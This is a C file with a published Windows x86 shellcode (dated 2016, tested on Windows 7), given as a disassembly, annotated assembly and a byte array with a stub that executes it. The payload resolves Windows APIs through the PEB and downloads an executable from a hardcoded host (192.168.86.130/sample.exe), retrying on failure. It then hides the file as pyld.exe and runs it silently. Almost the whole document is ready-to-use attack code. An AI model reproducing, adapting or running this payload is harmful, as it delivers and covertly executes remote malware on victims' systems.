/* Title : Windows x86 URLDownloadToFileA()+SetFileAttributesA()+WinExec()+ExitProcess() shellcode Date : 12-07-2016 Author : Roziul Hasan Khan Shifat Tested on: Windows 7 x86 */ /* Disassembly of section .text: 00000000 <_start>: 0: 31 c9 xor %ecx,%ecx 2: 64 8b 41 30 mov %fs:0x30(%ecx),%eax 6: 8b 40 0c mov 0xc(%eax),%eax 9: 8b 70 14 mov 0x14(%eax),%esi c: ad lods %ds:(%esi),%eax d: 96 xchg %eax,%esi e: ad lods %ds:(%esi),%eax f: 8b 48 10 mov 0x10(%eax),%ecx 12: 8b 59 3c mov 0x3c(%ecx),%ebx 15: 01 cb add %ecx,%ebx 17: 8b 5b 78 mov 0x78(%ebx),%ebx 1a: 01 cb add %ecx,%ebx 1c: 8b 73 20 mov 0x20(%ebx),%esi 1f: 01 ce add %ecx,%esi 21: 31 d2 xor %edx,%edx 00000023 : 23: 42 inc %edx 24: ad lods %ds:(%esi),%eax 25: 01 c8 add %ecx,%eax 27: 81 38 47 65 74 50 cmpl $0x50746547,(%eax) 2d: 75 f4 jne 23 2f: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax) 36: 75 eb jne 23 38: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax) 3f: 75 e2 jne 23 41: 8b 73 1c mov 0x1c(%ebx),%esi 44: 01 ce add %ecx,%esi 46: 8b 14 96 mov (%esi,%edx,4),%edx 49: 01 ca add %ecx,%edx 4b: 31 f6 xor %esi,%esi 4d: 89 d6 mov %edx,%esi 4f: 89 cf mov %ecx,%edi 51: 31 c0 xor %eax,%eax 53: 50 push %eax 54: 68 61 72 79 41 push $0x41797261 59: 68 4c 69 62 72 push $0x7262694c 5e: 68 4c 6f 61 64 push $0x64616f4c 63: 54 push %esp 64: 51 push %ecx 65: ff d2 call *%edx 67: 83 c4 0c add $0xc,%esp 6a: 31 c9 xor %ecx,%ecx 6c: 68 6c 6c 41 41 push $0x41416c6c 71: 88 4c 24 02 mov %cl,0x2(%esp) 75: 68 6f 6e 2e 64 push $0x642e6e6f 7a: 68 75 72 6c 6d push $0x6d6c7275 7f: 54 push %esp 80: ff d0 call *%eax 82: 83 c4 0c add $0xc,%esp 85: 31 c9 xor %ecx,%ecx 87: 68 65 41 42 42 push $0x42424165 8c: 88 4c 24 02 mov %cl,0x2(%esp) 90: 68 6f 46 69 6c push $0x6c69466f 95: 68 6f 61 64 54 push $0x5464616f 9a: 68 6f 77 6e 6c push $0x6c6e776f 9f: 68 55 52 4c 44 push $0x444c5255 a4: 54 push %esp a5: 50 push %eax a6: ff d6 call *%esi a8: 83 c4 14 add $0x14,%esp ab: 50 push %eax 000000ac : ac: 58 pop %eax ad: 31 c9 xor %ecx,%ecx af: 51 push %ecx b0: 68 2e 65 78 65 push $0x6578652e b5: 68 6d 70 6c 65 push $0x656c706d ba: 68 30 2f 73 61 push $0x61732f30 bf: 68 36 2e 31 33 push $0x33312e36 c4: 68 36 38 2e 38 push $0x382e3836 c9: 68 39 32 2e 31 push $0x312e3239 ce: 68 3a 2f 2f 31 push $0x312f2f3a d3: 68 68 74 74 70 push $0x70747468 d8: 54 push %esp d9: 59 pop %ecx da: 31 db xor %ebx,%ebx dc: 53 push %ebx dd: 68 2e 65 78 65 push $0x6578652e e2: 68 70 79 6c 64 push $0x646c7970 e7: 54 push %esp e8: 5b pop %ebx e9: 31 d2 xor %edx,%edx eb: 50 push %eax ec: 52 push %edx ed: 52 push %edx ee: 53 push %ebx ef: 51 push %ecx f0: 52 push %edx f1: ff d0 call *%eax f3: 59 pop %ecx f4: 83 c4 2c add $0x2c,%esp f7: 31 d2 xor %edx,%edx f9: 39 d0 cmp %edx,%eax fb: 51 push %ecx fc: 75 ae jne ac fe: 5a pop %edx ff: 31 d2 xor %edx,%edx 101: 68 73 41 42 42 push $0x42424173 106: 88 54 24 02 mov %dl,0x2(%esp) 10a: 68 62 75 74 65 push $0x65747562 10f: 68 74 74 72 69 push $0x69727474 114: 68 69 6c 65 41 push $0x41656c69 119: 68 53 65 74 46 push $0x46746553 11e: 54 push %esp 11f: 57 push %edi 120: ff d6 call *%esi 122: 83 c4 14 add $0x14,%esp 125: 31 c9 xor %ecx,%ecx 127: 51 push %ecx 128: 68 2e 65 78 65 push $0x6578652e 12d: 68 70 79 6c 64 push $0x646c7970 132: 54 push %esp 133: 59 pop %ecx 134: 31 d2 xor %edx,%edx 136: 83 c2 02 add $0x2,%edx 139: 52 push %edx 13a: 51 push %ecx 13b: ff d0 call *%eax 13d: 83 c4 08 add $0x8,%esp 140: 31 c9 xor %ecx,%ecx 142: 68 78 65 63 41 push $0x41636578 147: 88 4c 24 03 mov %cl,0x3(%esp) 14b: 68 57 69 6e 45 push $0x456e6957 150: 54 push %esp 151: 57 push %edi 152: ff d6 call *%esi 154: 83 c4 08 add $0x8,%esp 157: 31 c9 xor %ecx,%ecx 159: 51 push %ecx 15a: 68 2e 65 78 65 push $0x6578652e 15f: 68 70 79 6c 64 push $0x646c7970 164: 54 push %esp 165: 59 pop %ecx 166: 31 d2 xor %edx,%edx 168: 52 push %edx 169: 51 push %ecx 16a: ff d0 call *%eax 16c: 83 c4 08 add $0x8,%esp 16f: 31 c9 xor %ecx,%ecx 171: 68 65 73 73 41 push $0x41737365 176: 88 4c 24 03 mov %cl,0x3(%esp) 17a: 68 50 72 6f 63 push $0x636f7250 17f: 68 45 78 69 74 push $0x74697845 184: 54 push %esp 185: 57 push %edi 186: ff d6 call *%esi 188: ff d0 call *%eax */ /* section .text global _start _start: xor ecx,ecx mov eax,[fs:ecx+0x30] ;Eax=PEB mov eax,[eax+0xc] ;eax=PEB.Ldr mov esi,[eax+0x14] ;esi=PEB.Ldr->InMemOrderModuleList lodsd xchg esi,eax lodsd mov ecx,[eax+0x10] ;ecx=kernel32.dll base address ;------------------------------------ mov ebx,[ecx+0x3c] ;kernel32.dll +0x3c=DOS->e_flanew add ebx,ecx ;ebx=PE HEADER mov ebx,[ebx+0x78];Data_DIRECTORY->VirtualAddress add ebx,ecx ;IMAGE_EXPORT_DIRECTORY mov esi,[ebx+0x20] ;AddressOfNames add esi,ecx ;------------------------------------------ xor edx,edx count: inc edx lodsd add eax,ecx cmp dword [eax],'GetP' jnz count cmp dword [eax+4],'rocA' jnz count cmp dword [eax+8],'ddre' jnz count ;--------------------------------------------- mov esi,[ebx+0x1c] ;AddressOfFunctions add esi,ecx mov edx,[esi+edx*4] add edx,ecx ;edx=GetProcAddress() ;----------------------------------------- xor esi,esi mov esi,edx ;GetProcAddress() mov edi,ecx ;kernel32.dll ;------------------------------------ ;finding address of LoadLibraryA() xor eax,eax push eax push 0x41797261 push 0x7262694c push 0x64616f4c push esp push ecx call edx ;------------------------ add esp,12 ;----------------------------- ;LoadLibraryA("urlmon.dll") xor ecx,ecx push 0x41416c6c mov [esp+2],byte cl push 0x642e6e6f push 0x6d6c7275 push esp call eax ;----------------------- add esp,12 ;----------------------- ;finding address of URLDownloadToFileA() xor ecx,ecx push 0x42424165 mov [esp+2],byte cl push 0x6c69466f push 0x5464616f push 0x6c6e776f push 0x444c5255 push esp push eax call esi ;------------------------ add esp,20 push eax ;--------------------------------------- ;URLDownloadToFileA(NULL,url,save as,0,NULL) download: pop eax xor ecx,ecx push ecx ;----------------------------- ;change it to file url push 0x6578652e push 0x656c706d push 0x61732f30 push 0x33312e36 push 0x382e3836 push 0x312e3239 push 0x312f2f3a push 0x70747468 ;----------------------------------- push esp pop ecx ;url http://192.168.86.130/sample.exe xor ebx,ebx push ebx ;------------------------ ;save as (no need change it.if U want to change it,do it) push 0x6578652e push 0x646c7970 ;------------------------------- push esp ;pyld.exe pop ebx ;save as xor edx,edx push eax push edx push edx push ebx push ecx push edx call eax ;------------------------- pop ecx add esp,44 xor edx,edx cmp eax,edx push ecx jnz download ;if it fails to download , retry contineusly ;------------------ pop edx ;----------------------- ;Finding address of SetFileAttributesA() xor edx,edx push 0x42424173 mov [esp+2],byte dl push 0x65747562 push 0x69727474 push 0x41656c69 push 0x46746553 push esp push edi call esi ;-------------------------------- add esp,20 ;U must adjust stack or it will crash ;-------------------- ;calling SetFileAttributesA("pyld.exe",FILE_ATTRIBUTE_HIDDEN) xor ecx,ecx push ecx push 0x6578652e push 0x646c7970 push esp pop ecx xor edx,edx add edx,2 ;FILE_ATTRIBUTE_HIDDEN push edx push ecx call eax ;------------------- add esp,8 ;--------------------------- ;finding address of WinExec() xor ecx,ecx push 0x41636578 mov [esp+3],byte cl push 0x456e6957 push esp push edi call esi ;---------------------- add esp,8 ;------------------------ ;calling WinExec("pyld.exe",0) xor ecx,ecx push ecx push 0x6578652e push 0x646c7970 push esp pop ecx xor edx,edx push edx push ecx call eax ;------------------------- add esp,8 ;----------------------------- ;finding address of ExitProcess() xor ecx,ecx push 0x41737365 mov [esp+3],byte cl push 0x636f7250 push 0x74697845 push esp push edi call esi ;-------------- call eax */ #include #include char shellcode[]="\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x31\xf6\x89\xd6\x89\xcf\x31\xc0\x50\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x51\xff\xd2\x83\xc4\x0c\x31\xc9\x68\x6c\x6c\x41\x41\x88\x4c\x24\x02\x68\x6f\x6e\x2e\x64\x68\x75\x72\x6c\x6d\x54\xff\xd0\x83\xc4\x0c\x31\xc9\x68\x65\x41\x42\x42\x88\x4c\x24\x02\x68\x6f\x46\x69\x6c\x68\x6f\x61\x64\x54\x68\x6f\x77\x6e\x6c\x68\x55\x52\x4c\x44\x54\x50\xff\xd6\x83\xc4\x14\x50\x58\x31\xc9\x51\x68\x2e\x65\x78\x65\x68\x6d\x70\x6c\x65\x68\x30\x2f\x73\x61\x68\x36\x2e\x31\x33\x68\x36\x38\x2e\x38\x68\x39\x32\x2e\x31\x68\x3a\x2f\x2f\x31\x68\x68\x74\x74\x70\x54\x59\x31\xdb\x53\x68\x2e\x65\x78\x65\x68\x70\x79\x6c\x64\x54\x5b\x31\xd2\x50\x52\x52\x53\x51\x52\xff\xd0\x59\x83\xc4\x2c\x31\xd2\x39\xd0\x51\x75\xae\x5a\x31\xd2\x68\x73\x41\x42\x42\x88\x54\x24\x02\x68\x62\x75\x74\x65\x68\x74\x74\x72\x69\x68\x69\x6c\x65\x41\x68\x53\x65\x74\x46\x54\x57\xff\xd6\x83\xc4\x14\x31\xc9\x51\x68\x2e\x65\x78\x65\x68\x70\x79\x6c\x64\x54\x59\x31\xd2\x83\xc2\x02\x52\x51\xff\xd0\x83\xc4\x08\x31\xc9\x68\x78\x65\x63\x41\x88\x4c\x24\x03\x68\x57\x69\x6e\x45\x54\x57\xff\xd6\x83\xc4\x08\x31\xc9\x51\x68\x2e\x65\x78\x65\x68\x70\x79\x6c\x64\x54\x59\x31\xd2\x52\x51\xff\xd0\x83\xc4\x08\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x54\x57\xff\xd6\xff\xd0"; main() { printf("shellcode length %ld\n",(long)strlen(shellcode)); (* (int(*)()) shellcode) (); }